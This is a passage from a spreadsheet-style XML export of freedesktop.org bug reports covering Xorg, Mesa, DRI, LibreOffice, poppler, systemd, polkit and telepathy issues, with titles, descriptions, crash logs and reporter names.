  File : /usr/lib/python2.5/site-packages/yum/yumRepo.py line 217 in _check_db_version
    return repo._check_db_version(mdtype)
  File : /usr/lib/python2.5/site-packages/yum/yumRepo.py line 1083 in _check_db_version
    repoXML = self.repoXML
  File : /usr/lib/python2.5/site-packages/yum/yumRepo.py line 1241 in 
    repoXML = property(fget=lambda self: self._getRepoXML()
  File : /usr/lib/python2.5/site-packages/yum/yumRepo.py line 1237 in _getRepoXML
    raise Errors.RepoError msg</t>
  </si>
  <si>
    <t>jhclemente</t>
  </si>
  <si>
    <t>ZEITGEIST-62076</t>
  </si>
  <si>
    <t>gtkdoc check is not being made in configure script which leads to build failure</t>
  </si>
  <si>
    <t>Created attachment 76246
Fixes build failure if valadoc is present but gtkdoc-* is missing
If gtk-doc-tools is not installed and valadoc is installed then the build system is tricked into thinking that the conditions are met since it only checks for valadoc if --enable-docs is yes
This patch fixes it by checking for gtkdoc-scan too</t>
  </si>
  <si>
    <t>manishsinha</t>
  </si>
  <si>
    <t>DRI-71208</t>
  </si>
  <si>
    <t>[regression] module_reload segfault</t>
  </si>
  <si>
    <t>Created attachment 88587
dmesg
System Environment:
--------------------------
Platform: Haswell
Kernel:   (drm-intel-nightly)265a909ea074a346af0c40e41c7da10464046277
Bug detailed description:
-----------------------------
It happens on haswell with -nightly and drm-next branch. It doesn't happens on -queued and -fixes kernel.
Run the first cycle It causes call trace:
output:
module successfully unloaded
module successfully loaded again
dmesg:
[   31.122255] ------------[ cut here ]------------
[   31.122373] WARNING: CPU: 2 PID: 3913 at fs/sysfs/file.c:498 sysfs_attr_ns+0x25/0x8c()
[   31.122545] sysfs: kobject \xffffffd0\xffffff85\xffffff85\x04\xffffff9e without dirent
[   31.122660] Modules linked in: netconsole configfs ipv6 dm_mod snd_hda_codec_realtek pcspkr snd_hda_codec_hdmi i2c_i801 iTCO_wdt iTCO_vendor_support lpc_ich mfd_core snd_hda_codec snd_hwdep snd_pcm snd_page_alloc snd_timer snd soundcore acpi_cpufreq i915(-) video button drm_kms_helper drm freq_table [last unloaded: snd_hda_intel]
[   31.124140] CPU: 2 PID: 3913 Comm: rmmod Not tainted 3.12.0-rc7_nightlytop_265a90_20131104_+ #2203
[   31.124317] Hardware name: Intel Corporation Shark Bay Client platform/Flathead Creek Crb BIOS HSWLPTU1.86C.0131.R03.1307262359 07/26/2013
[   31.124498]  0000000000000000 0000000000000009 ffffffff8170464c ffff880243723cd8
[   31.124827]  ffffffff8103319e ffff880200000000 ffffffff8112f8b7 ffff880243723ca8
[   31.125153]  ffffffff81adc2b0 ffff88009e073610 ffff88009e0c7a00 ffff88009e13db40
[   31.125477] Call Trace:
[   31.125579]  [] ? dump_stack+0x41/0x51
[   31.125693]  [] ? warn_slowpath_common+0x73/0x8b
[   31.125809]  [] ? sysfs_attr_ns+0x25/0x8c
[   31.125916]  [] ? warn_slowpath_fmt+0x45/0x4a
[   31.126028]  [] ? sysfs_attr_ns+0x25/0x8c
[   31.126142]  [] ? sysfs_remove_file+0x16/0x32
[   31.126255]  [] ? device_del+0x114/0x17a
[   31.126368]  [] ? device_unregister+0x9/0x12
[   31.126487]  [] ? drm_sysfs_connector_remove+0x7d/0x89 [drm]
[   31.126672]  [] ? intel_modeset_cleanup+0xb9/0xe2 [i915]
[   31.126796]  [] ? i915_driver_unload+0xb6/0x2a7 [i915]
[   31.126909]  [] ? drm_dev_unregister+0x21/0xd0 [drm]
[   31.127025]  [] ? drm_put_dev+0x48/0x51 [drm]
[   31.127137]  [] ? pci_device_remove+0x24/0x48
[   31.127251]  [] ? __device_release_driver+0x68/0xc1
[   31.127364]  [] ? driver_detach+0x6e/0x99
[   31.127476]  [] ? bus_remove_driver+0x78/0xb9
[   31.127590]  [] ? pci_unregister_driver+0x17/0x75
[   31.127703]  [] ? drm_pci_exit+0x3b/0x72 [drm]
[   31.127817]  [] ? SyS_delete_module+0x1a3/0x219
[   31.127929]  [] ? page_fault+0x22/0x30
[   31.128039]  [] ? system_call_fastpath+0x16/0x1b
[   31.128152] ---[ end trace 67e4404f3dd63a8a ]---
Run the 2nd cycle It segfault.
output:
./module_reload: line 27: 18675 Segmentation fault      rmmod i915
WARNING: i915.ko still loaded!
Reproduce steps:
----------------------------
1. ./module_reload</t>
  </si>
  <si>
    <t>SYSTEMD-87602</t>
  </si>
  <si>
    <t>systemd-user not working with .mount's</t>
  </si>
  <si>
    <t>systemctl --user start .mount won't work because it uses the -n (--no-mtab) for mount which is not permitted for non-root users.
Example:
$ cat ~/.config/systemd/user/home-devkid-Mounts-eeets.mount
[Mount]
What=sshfs#eeets:
Where=/home/devkid/Mounts/eeets
Type=fuse
Options=idmap=userworkaround=rename
$ systemctl --user start home-devkid-Mounts-eeets.mount
Job for home-devkid-Mounts-eeets.mount failed. See systemctl status home-devkid-Mounts-eeets.mount and journalctl -xe for details.
$ journalctl -xe
Dez 22 18:41:32 desktop systemd[1887]: Mounting /home/devkid/Mounts/eeets...
-- Subject: Unit UNIT has begun with start-up
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
-- 
-- Unit UNIT has begun starting up.
Dez 22 18:41:32 desktop systemd[1887]: home-devkid-Mounts-eeets.mount mount process exited code=exited status=1
Dez 22 18:41:32 desktop systemd[1887]: Failed to mount /home/devkid/Mounts/eeets.
-- Subject: Unit UNIT has failed
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
-- 
-- Unit UNIT has failed.
-- 
-- The result is failed.
Dez 22 18:41:32 desktop systemd[1887]: Unit home-devkid-Mounts-eeets.mount entered failed state.
Dez 22 18:41:32 desktop mount[5648]: mount: nur Â»rootÂ« kann die Option Â»--no-mtabÂ« verwenden</t>
  </si>
  <si>
    <t>devkid</t>
  </si>
  <si>
    <t>LIBREOFFICE-64707</t>
  </si>
  <si>
    <t>Unable to start application using desktop menu on Linux</t>
  </si>
  <si>
    <t>I get the following error when starting a fresh 4.1.0.0.alpha1+ build from the desktop menu entry on SLED11-SP3:
      /home/pmladek/%FILE% does not exist
I guess that it is related to the fix for the bug #64311 and the commit http://cgit.freedesktop.org/libreoffice/core/commit/?id=363b82fdb4016bc42877fea2ebde9227b27579fe. I wonder how it is supposed to work :-)</t>
  </si>
  <si>
    <t>POPPLER-91053</t>
  </si>
  <si>
    <t>poppler GlobalParamsWin bug/fixes</t>
  </si>
  <si>
    <t>Created attachment 116646
GlobalParamsWin fixes
While building poppler for windows there were some bugs there are fixes.
Possibility to pass non \0 terminated string to output if the missing font name longer then static GooString length (at line 447 of the GlobalParamsWin .cc) and some memory leaks. See diff.</t>
  </si>
  <si>
    <t>lztoad</t>
  </si>
  <si>
    <t>MESA-23450</t>
  </si>
  <si>
    <t>[softpipe] piglit texdepth fails</t>
  </si>
  <si>
    <t>mesa: (master) ef98eed0a94f3b76399b19f9f65ca6977cd11b5d
% ./bin/texdepth -auto
GL_ARB_shadow_ambient not supported.
Probe at (14416)
  Expected: 0.250000 0.250000 0.250000 1.000000
  Observed: 0.988235 0.988235 0.988235 1.000000
Test failed: 'Render textures GL_LUMINANCE (no shadow functionality)'
See above for details.
PIGLIT: {'result': 'fail' }</t>
  </si>
  <si>
    <t>LIBREOFFICE-70221</t>
  </si>
  <si>
    <t>RTF: a PNG picture is shown twice</t>
  </si>
  <si>
    <t>Created attachment 87228
Problematic RTF file
See attached RTF file: in the Main section the PNG picture is displayed twice. Can't reproduce with Word 2013 or OpenOffice Writer 4.0.1</t>
  </si>
  <si>
    <t>XORG-27518</t>
  </si>
  <si>
    <t>[Clarkdale] Screen constantly shakes</t>
  </si>
  <si>
    <t>Created attachment 34772
xorg log
At boot selection screen is normal. When I choose default boot the splash screen comes up and looks normal for about half a second then it flashes and slightly changes color and constantly shakes from then on. Restarting X at the GDM prompt also comes back up shaking. See attached Xorg.0.log
See https://bugzilla.novell.com/show_bug.cgi?id=572102 for detailed history. I have tried booting with a different make of monitor - still shakes.
user1@localhost:~/Downloads&gt; uname -a
Linux localhost 2.6.32.10-0.4-pae #1 SMP 2010-03-29 11:58:05 +0200 i686 i686 i386 GNU/Linux
user1@localhost:~/Downloads&gt; /usr/sbin/hwinfo --gfxcard
08: PCI 02.0: 0300 VGA compatible controller (VGA)              
  [Created at pci.318]
  UDI: /org/freedesktop/Hal/devices/pci_8086_42
  Unique ID: _Znp.VluZtC13qh6
  SysFS ID: /devices/pci0000:00/0000:00:02.0
  SysFS BusID: 0000:00:02.0
  Hardware Class: graphics card
  Model: Intel Core Processor Integrated Graphics Controller
  Vendor: pci 0x8086 Intel Corporation
  Device: pci 0x0042 Core Processor Integrated Graphics Controller
  SubVendor: pci 0x8086 Intel Corporation
  SubDevice: pci 0x0042 
  Revision: 0x08
  Driver: i915
  Driver Modules: drm
  Memory Range: 0xff000000-0xff3fffff (rwnon-prefetchable)
  Memory Range: 0xd0000000-0xdfffffff (rwprefetchable)
  I/O Ports: 0xf100-0xf107 (rw)
  IRQ: 37 (11973 events)
  I/O Ports: 0x3c0-0x3df (rw)
  Module Alias: pci:v00008086d00000042sv00008086sd00000042bc03sc00i00
  Driver Info #0:
    Driver Status: i915 is active
    Driver Activation Cmd: modprobe i915
  Config Status: cfg=no avail=yes need=no active=unknown
Primary display adapter: #8</t>
  </si>
  <si>
    <t>scottreeves4</t>
  </si>
  <si>
    <t>XORG-2390</t>
  </si>
  <si>
    <t>MSE_MAXBUTTONS too small</t>
  </si>
  <si>
    <t>MSE_MAXBUTTONS is defined as 12 in xf86OSmouse.h
On Linux the evdev protocol supports mice with up to 16 buttons which with
zaxis mapping means MSE_MAXBUTTONS should be at least 20.
Example: my Logitech MediaPlay has 13 physical buttons and a scroll wheel.
As far as I can tell changing MSE_MAXBUTTONS to up to 31 should be OK as the
mouse driver holds a button bit map in an int but there might be other
dependencies I don't know about.
(also raised as XFree86 bug 1536)</t>
  </si>
  <si>
    <t>julian_cable</t>
  </si>
  <si>
    <t>TELEPATHY-21166</t>
  </si>
  <si>
    <t>spec 0.17.23 will make Requests interface mandatory</t>
  </si>
  <si>
    <t>Idle doesn't seem to implement the Requests D-Bus API. Future work including telepathy-qt4 and probably Mission Control 5 will require that API and it will be made mandatory in the next spec release.</t>
  </si>
  <si>
    <t>XORG-11278</t>
  </si>
  <si>
    <t>EDID modes not added to CRT2 screen in MergedFB mode</t>
  </si>
  <si>
    <t>The monitor section of CRT2 screen is created by basically memcpy'ing 
primary screen to CRT2 screen which initially has user defined and
default modes in monitor-&gt;modes. However CRT2pScrn-&gt;monitor-&gt;Last is 
not updated to reflect the new last mode created for CRT2. Since EDID 
modes are appended to modes pointed to by monitor-&gt;Last they are not 
added.</t>
  </si>
  <si>
    <t>henry.zhao</t>
  </si>
  <si>
    <t>POPPLER-12661</t>
  </si>
  <si>
    <t>PDFs with layers</t>
  </si>
  <si>
    <t>This document is a statistic issued by the Swiss government. According to its metadata it was produced in September 2007 with Adobe InDesign CS2 (4.0.2).
The document uses several layers. The Acrobat Reader does not show some of the layers by default but all free readers I tried did resulting in a garbled display (the difference is very obvious).
I tried:
* Adobe Reader 7.0.8
* evince 0.8.3 (with poppler 0.5.4)
* evince 2.20.0 (with poppler 0.6) (Ubuntu Tribe 5 + updates)
* xpdf 3.01
* kpdf 0.5.7</t>
  </si>
  <si>
    <t>rl</t>
  </si>
  <si>
    <t>FONTCONFIG-19845</t>
  </si>
  <si>
    <t>Typo in fcfreetype.c that presumably affects some Chinese fonts</t>
  </si>
  <si>
    <t>In fcfreetype.c there is:
 {  TT_PLATFORM_MICROSOFT	TT_MS_ID_GB2312	GB3212 }
The string should of course be GB2312.
I haven't verified yet what fixing this does. I assume it just affects the font's name? But maybe it also helps the use of a font that has a TT_PLATFORM_MICROSOFT TT_MS_ID_GB2312 cmap but no TT_PLATFORM_MICROSOFT TT_MS_ID_UNICODE_CS cmap. Such fonts don't seem to work too well at least in GIMP's text tool. One such font is at http://www.sino.uni-heidelberg.de/edv/sinopc/chinese_fonts.htm  the first font on the page at least.</t>
  </si>
  <si>
    <t>DRI-110033</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@kms_plane@pixel-format-pipe-[abc]-planes* - fail - WARNING: CRC mismatch with format YUYV (0x56595559) on [ABC].0</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5736/shard-apl6/igt@kms_plane@pixel-format-pipe-c-planes.html
Starting subtest: pixel-format-pipe-C-planes
(kms_plane:3706) WARNING: CRC mismatch with format YUYV (0x56595559) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YUYV (0x56595559) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YUYV (0x56595559) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YUYV (0x56595559) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YUYV (0x56595559) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YUYV (0x56595559) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YUYV (0x56595559) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YVYU (0x55595659) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YVYU (0x55595659) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YVYU (0x55595659) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YVYU (0x55595659) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YVYU (0x55595659) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YVYU (0x55595659) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format YVYU (0x55595659) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format UYVY (0x59565955) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format UYVY (0x59565955) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format UYVY (0x59565955) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format UYVY (0x59565955) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format UYVY (0x59565955) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format UYVY (0x59565955) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format UYVY (0x59565955) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format VYUY (0x59555956) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format VYUY (0x59555956) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format VYUY (0x59555956) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format VYUY (0x59555956) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format VYUY (0x59555956) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format VYUY (0x59555956) on C.0
(kms_plane:3706) WARNING: CRC mismatch with format VYUY (0x59555956) on C.0
(kms_plane:3706) CRITICAL: Test assertion failure function test_pixel_formats file ../tests/kms_plane.c:587:
(kms_plane:3706) CRITICAL: Failed assertion: result
(kms_plane:3706) CRITICAL: At least one CRC mismatch happened
Subtest pixel-format-pipe-C-planes failed.</t>
  </si>
  <si>
    <t>MESA-36609</t>
  </si>
  <si>
    <t>45920d2ecb38b14fdda5253fecce996570c22863 breaks sauerbraten on r300g</t>
  </si>
  <si>
    <t>This commit breaks some textures (it hides half of a rectangular texture leaving a triangle) in sauerbraten (example: the explosion texture on a wall on justice map) with r300g. It's fine with llvmpipe.
45920d2ecb38b14fdda5253fecce996570c22863 is the first bad commit
commit 45920d2ecb38b14fdda5253fecce996570c22863
Author: pepp 
Date:   Mon Apr 11 17:16:45 2011 +0200
    u_vbuf_mgr: fixed vbo max_index calculation
    Signed-off-by: Marek OlÅ¡Ã¡k 
:040000 040000 56baa6ab66d41990ebd6052fe2fdb723e1e6a480 a4065a7d1586baeb169a05d6194d01735dc3025e M	src</t>
  </si>
  <si>
    <t>LIBREOFFICE-83278</t>
  </si>
  <si>
    <t>Missing type of directory at Tools - Options - LibreOffceDev - Paths</t>
  </si>
  <si>
    <t>Hello @ll
I hope I have chosen the right component and all. If not feel free to change it adequate ... )
While I was configuring my parallel installed Version:Â 4.4.0.0.alpha0+ Build ID: 1298c1d13572c6fbfbabb813b2d6843368c6df1f TinderBox: Linux-rpm_deb-x86@45-TDF Branch:master Time:Â 2014-08-29_00:42:19 (following the instructions fromÂ https://wiki.documentfoundation.org/Installing_in_parallel) and withÂ the en_US lang- as well as helppack under Debian Testing IÂ discovered the following:
1. Start LO
2. Go to Tools â€“ Options then LibreOfficeDev â€“ Paths
On my system all of the different type of directories (AutoCorrectÂ AutoText Backups etc.) are missing there ... :(
I have reported it to our qa ml where Robert confirmed it with OpenSuse 64Bit (see http://nabble.documentfoundation.org/Libreoffice-qa-Type-of-directories-missing-in-quot-Tools-Options-LibreOfficeDev-Paths-quot-in-4-4-0--td4120768.html for the thread) but I am not sure if I should change architecture to All ... :(
Sorry for the inconvenience and have a nice evening
Thomas.</t>
  </si>
  <si>
    <t>XORG-2206</t>
  </si>
  <si>
    <t>Missing return value in xfree86/xf86config/xorgconfig.c</t>
  </si>
  <si>
    <t>The int function screen_configuration() contains:
 	if (card_selected == -1 || (card[card_selected].flags &amp; UNSUPPORTED))
		return
The attached patch will take care of this.</t>
  </si>
  <si>
    <t>LIBREOFFICE-65863</t>
  </si>
  <si>
    <t>Image Auto Rotates when inserted</t>
  </si>
  <si>
    <t>I am writing an article for my club newsletter. I tried adding an image that is taller than wide. When it imports (jpeg file) the program rotates the image 90* to the right so my image is laying on its side. And I can't find a way to rotate the image back again. I've tried deleting the image and reimporting it but it still gets rotated.</t>
  </si>
  <si>
    <t>jgallaway81</t>
  </si>
  <si>
    <t>TELEPATHY-68149</t>
  </si>
  <si>
    <t>Erroneous warning if CM does not implement SimplePresence</t>
  </si>
  <si>
    <t>telepathy-idle does not implement SimplePresence but when preparing TpContact objects it prints:
(lt-empathy:18345): tp-glib/contacts-WARNING **: tp_contact_set_attributes: /org/freedesktop/Telepathy/Connection/idle/irc/testman_40chat_2efreenode_2enet0x17a31c0 supposedly implements Contacts and SimplePresence but omitted the mandatory org.freedesktop.Telepathy.Connection.Interface.SimplePresence/presence attribute
This is wrong idle never claimed to implement SimplePresence. That warning is displayed if we WANT the presence but CM did not give it because it's not supported. There is a similar warning in the ALIAS case but not in all other cases...</t>
  </si>
  <si>
    <t>XORG-92523</t>
  </si>
  <si>
    <t>[Quadro FX 370] Compiz freezes entire desktop.</t>
  </si>
  <si>
    <t>Created attachment 118962
Dmesg
I have already reported this issue on lauchpad: https://bugs.launchpad.net/ubuntu/+source/compiz/+bug/1487553.
My Desktop freezes and Compiz process occupies 100% of CPU for a long while if you wait 3-4 minutes  it will recover but the issue is very annoying.
This is my hardware: https://gist.github.com/anonymous/3203c7c5a43a509c0f22.
I have Ubuntu Wily Werewolf (development branch) 15.10 installed.</t>
  </si>
  <si>
    <t>carla.sella</t>
  </si>
  <si>
    <t>POLICYKIT-93991</t>
  </si>
  <si>
    <t>traps: polkitd[785] general protection ip:7f8c2f0bcca2 sp:7fffa0607190 error:0 in libmozjs-17.0.so</t>
  </si>
  <si>
    <t>This issue may be the same as reported in https://bugzilla.redhat.com/show_bug.cgi?id=910262.  Below is the /var/messages.  Issue happens sporadically so I don't have a call trace.  Will capture during next occurrence.
Feb  2 10:15:18 jhonsa-linux kernel: traps: polkitd[785] general protection ip:7f8c2f0bcca2 sp:7fffa0607190 error:0 in libmozjs-17.0.so[7f8c2ef7e000+3b3000]
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.wifi.share.open: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.wifi.share.protected: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.wifi.share.open: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.wifi.share.protected: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.settings.modify.hostname: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.settings.modify.own: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.settings.modify.system: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.wifi.share.open: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.wifi.share.protected: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.network-control: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux NetworkManager[853]:   error requesting auth for org.freedesktop.NetworkManager.enable-disable-wimax: (0) Authorization check failed: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message did not receive a reply (timeout by message bus)
Feb  2 10:15:18 jhonsa-linux dbus[751]: [system] Activating via systemd: service name='org.freedesktop.PolicyKit1' unit='polkit.service'
Feb  2 10:15:18 jhonsa-linux dbus-daemon: dbus[751]: [system] Activating via systemd: service name='org.freedesktop.PolicyKit1' unit='polkit.service'
Feb  2 10:15:18 jhonsa-linux systemd: polkit.service: main process exited code=killed status=11/SEGV
Feb  2 10:15:18 jhonsa-linux systemd: Unit polkit.service entered failed state.
Feb  2 10:15:18 jhonsa-linux systemd: polkit.service failed.
Feb  2 10:15:18 jhonsa-linux systemd: Starting Authorization Manager...
Feb  2 10:15:18 jhonsa-linux polkitd[11317]: Started polkitd version 0.112
Feb  2 10:15:18 jhonsa-linux dbus[751]: [system] Successfully activated service 'org.freedesktop.PolicyKit1'
Feb  2 10:15:18 jhonsa-linux dbus-daemon: dbus[751]: [system] Successfully activated service 'org.freedesktop.PolicyKit1'
Feb  2 10:15:18 jhonsa-linux systemd: Started Authorization Manager.</t>
  </si>
  <si>
    <t>johninslp</t>
  </si>
  <si>
    <t>LIBREOFFICE-79181</t>
  </si>
  <si>
    <t>LibreOffice logo not vertically aligned in about dialog</t>
  </si>
  <si>
    <t>Created attachment 99720
how the LibO logo looks in the about dialog from 4.0 to 4.3
In the Help &gt; About dialog box the LibO logo is not centered vertically in the green background. This was tested in linux and has been a regression since 4.2 as it is correctly centered in 4.0 and 4.1.</t>
  </si>
  <si>
    <t>XORG-35398</t>
  </si>
  <si>
    <t>External monitor max resolution 1024x768 detected</t>
  </si>
  <si>
    <t>Resolution for monitor is 1680x1050.
Xorg -version 
X.Org X Server 1.9.4.901 (1.9.5 RC 1)
Kernel : 2.6.38-ARCH (no patches just logo changed)
xorg radeon from git 2011-03-04. Using gallium.
HW is  a laptop acer 4820TG with intel-ati combo. It's not a regression. This never worked for me.
Intel card detects monitor correctly.</t>
  </si>
  <si>
    <t>admiral0</t>
  </si>
  <si>
    <t>XORG-71161</t>
  </si>
  <si>
    <t>segfault in libglamor suspected cause: Mathematica Graphics operations</t>
  </si>
  <si>
    <t>When I use a lot of Graphics objects in Mathematica -- the help page of the Manipulate operation has a ton -- and scroll through the list 1 out of 10 times X crashes with the following trace:
[427236.328] (EE) 
[427236.328] (EE) Backtrace:
[427236.380] (EE) 0: /usr/bin/X (xorg_backtrace+0x3d) [0x57f67d]
[427236.380] (EE) 1: /usr/bin/X (0x400000+0x1833e9) [0x5833e9]
[427236.380] (EE) 2: /usr/lib/libpthread.so.0 (0x7f799d407000+0xf870) [0x7f799d416870]
[427236.380] (EE) 3: /usr/lib/libglamor.so.0 (0x7f799aad8000+0x11e41) [0x7f799aae9e41]
[427236.380] (EE) 4: /usr/lib/libglamor.so.0 (0x7f799aad8000+0x147bf) [0x7f799aaec7bf]
[427236.380] (EE) 5: /usr/lib/libglamor.so.0 (0x7f799aad8000+0x9412) [0x7f799aae1412]
[427236.380] (EE) 6: /usr/lib/libglamor.so.0 (0x7f799aad8000+0xb99c) [0x7f799aae399c]
[427236.380] (EE) 7: /usr/bin/X (0x400000+0x10bb96) [0x50bb96]
[427236.380] (EE) 8: /usr/bin/X (0x400000+0x10573e) [0x50573e]
[427236.380] (EE) 9: /usr/bin/X (0x400000+0x373be) [0x4373be]
[427236.380] (EE) 10: /usr/bin/X (0x400000+0x2693a) [0x42693a]
[427236.380] (EE) 11: /usr/lib/libc.so.6 (__libc_start_main+0xf5) [0x7f799c48abc5]
[427236.380] (EE) 12: /usr/bin/X (0x400000+0x26c81) [0x426c81]
[427236.380] (EE) 
[427236.380] (EE) Segmentation fault at address 0x0
[427236.380] (EE) 
Fatal server error:
[427236.380] (EE) Caught signal 11 (Segmentation fault). Server aborting
[427236.380] (EE) 
[427236.380] (EE) 
Please consult the The X.Org Foundation support 
         at http://wiki.x.org
 for help. 
[427236.380] (EE) Please also check the log file at /var/log/Xorg.0.log for additional information.
[427236.380] (EE)
Here are the relevant symbol map lines:
0000000000011920 t glamor_composite_with_shader
0000000000012530 t glamor_convert_gradient_picture
...
00000000000141e0 t glamor_composite_glyph_rects
00000000000148b0 t glamor_composite_rects
...
00000000000093c0 t glamor_glyphs_flush_dst
0000000000009450 t glamor_buffer_glyph
...
000000000000af90 t _glamor_glyphs.isra.12
000000000000be70 t glamor_glyphs_fini
I am running 0.5.1 with this patch: https://bugs.freedesktop.org/show_bug.cgi?id=64912
I recompiled with debug symbols and waiting for the next crash..</t>
  </si>
  <si>
    <t>clemens</t>
  </si>
  <si>
    <t>XORG-1061</t>
  </si>
  <si>
    <t>RenderAccel option isn't documented in radeon.4</t>
  </si>
  <si>
    <t>and users are already complaining about how to turn it on...</t>
  </si>
  <si>
    <t>LIBREOFFICE-37799</t>
  </si>
  <si>
    <t>Crash when Break (remove) DDE link to CALC</t>
  </si>
  <si>
    <t>Translated automatically from the Portuguese into English by Google translate
libreOffice restarts when trying to remove DDE link between writer and calc
The error occurs following the steps below:
1) a copy of the calc spreadsheet and paste it in Writer by pressing Ctrl + Shift + V and choose the Link DDE
2) Then the writer accessing the edit menu \ links ... and try to unlink.
The libreOffice crashes and restarts
S. O. Seven 64-bit Windows
Core2Duo processor
Original text
libreOffice reinicia ao tentar remover vÃ­nculo DDE entre writer e calc
O erro acontece seguindo as etapas abaixo:
1) copiar uma planilha do calc e colar no writer pressionando CTRL+Shift+V e escolher a opÃ§Ã£o VÃ­nculo DDE
2) Depois no writer acessar o menu editar\vÃ­nculos... e tentar Desvincular.
O libreOffice trava e Ã© reiniciado
S.O. Windows Seven 64 bits
Processador Core2Duo</t>
  </si>
  <si>
    <t>claupers</t>
  </si>
  <si>
    <t>DRI-92483</t>
  </si>
  <si>
    <t>[regression] Can only go to console (fbcon/fbdev) once. Screen gets blank on console mode on next attempts.</t>
  </si>
  <si>
    <t>Created attachment 118907
dmesg
-- system architecture: x86_64
-- kernel version: 4.3.0-rc5+ #12 SMP Thu Oct 15's drm-intel-nightly
-- Linux distribution: Fedora
-- Machine or mother board model: BDW
-- Display connector: eDP
-- Regression: Yes. Bisect points to 
bb1e52402b2a288b09ae37e8182599931c7e9df is the first bad commit
ommit bbb1e52402b2a288b09ae37e8182599931c7e9df
uthor: Rob Clark 
ate:   Tue Aug 25 15:35:58 2015 -0400
   drm/fb-helper: atomic restore_fbdev_mode()..
-- Steps to reproduce:
1. Boot to X
2. Alternate first time to fbcon (Ctrl+Alt+F2)
3. Get back to X (Ctrl+Alt+F1)
4. Alternate second time to fbcon (Ctrl+Alt+F2)
...
Only the first time you go to fbcon you can actually get the console. After that you only get a blank screen.
-- Comments on dmesg:
My dmesg is full of custom printks..
at 30 sec it is the first time going to fbcon where everything works... On the second one at 53s it seems fb_helper-&gt;fb is corrupted.</t>
  </si>
  <si>
    <t>MESA-2910</t>
  </si>
  <si>
    <t>GetAllFBConfigs in pbutil.c has problems w/X.org GLX.</t>
  </si>
  <si>
    <t>I'm not sure if this problem is with GetAllFBConfigs in pbutil.c or with the
implementation of glXChooseFBConfigSGIX in the open-source libGL.  Either way
when GetAllFBConfigs uses glXChooseFBConfigSGIX with the attributes {
GLX_RENDER_TYPE 0 GLX_DRAWABLE_TYPE 0 None } no fbconfigs are returned. 
However changing the attributes to { GLX_DEPTH_SIZE 0 None } seems to work as
expected on the open-source libGL.  I haven't had a chance to test this yet with
Nvidia's libGL.
Which piece of code has the problem?</t>
  </si>
  <si>
    <t>YTSTENUT-46007</t>
  </si>
  <si>
    <t>ytstenut-glib</t>
  </si>
  <si>
    <t>make distcheck fails on doc generation</t>
  </si>
  <si>
    <t>This is the error
  DOC   Fixing cross-references
html/ytstenut-yts-version.html:60: warning: no link for: 'TRUE:CAPS' -&gt; (TRUE).
b=`tput bold` &amp;&amp; \
	n=`tput sgr0` &amp;&amp; \
